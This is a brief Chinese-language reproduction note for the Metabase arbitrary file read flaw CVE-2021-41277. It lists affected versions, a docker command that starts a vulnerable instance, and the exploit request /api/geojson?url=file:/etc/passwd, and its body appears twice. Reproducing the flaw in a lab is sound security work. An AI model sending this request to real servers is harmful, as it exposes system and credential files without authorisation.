MetaBase 任意文件读取漏洞(CVE-2021-41277) 复现
受影响的版本
x.40.0、x.40.1、x.40.2、x.40.3、x.40.4
环境搭建
docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4
启动完之后
exp 如下:
访问URL:/api/geojson?url=file:/etc/passwd
受影响的版本
x.40.0、x.40.1、x.40.2、x.40.3、x.40.4
环境搭建
docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4
启动完之后
exp 如下:
访问URL:/api/geojson?url=file:/etc/passwd